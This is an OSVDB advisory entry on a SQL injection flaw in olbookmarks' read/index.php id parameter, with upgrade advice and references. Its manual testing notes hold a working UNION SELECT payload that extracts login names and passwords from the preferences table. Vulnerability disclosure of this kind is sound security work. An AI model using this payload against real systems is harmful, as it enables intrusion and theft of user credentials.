olbookmarks read/index.php id Variable SQL Injection

2007-05-21T11:18:46
ID OSVDB:36492
Type osvdb
Reporter OSVDB
Modified 2007-05-21T11:18:46

Description

Solution Description

Upgrade to version 0.7.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

/read/index.php?name=alex&id=-1//union//select//0,1,2,3,4,5,password,login,8,9,10,11,12//from/*/preferences/

References:

Secunia Advisory ID: 25356
Related OSVDB ID: 36493
Mail List Post: http://attrition.org/pipermail/vim/2007-May/001623.html
ISS X-Force ID: 34414
Generic Exploit URL: http://www.milw0rm.com/exploits/3964
CVE-2007-2817
Bugtraq ID: 24085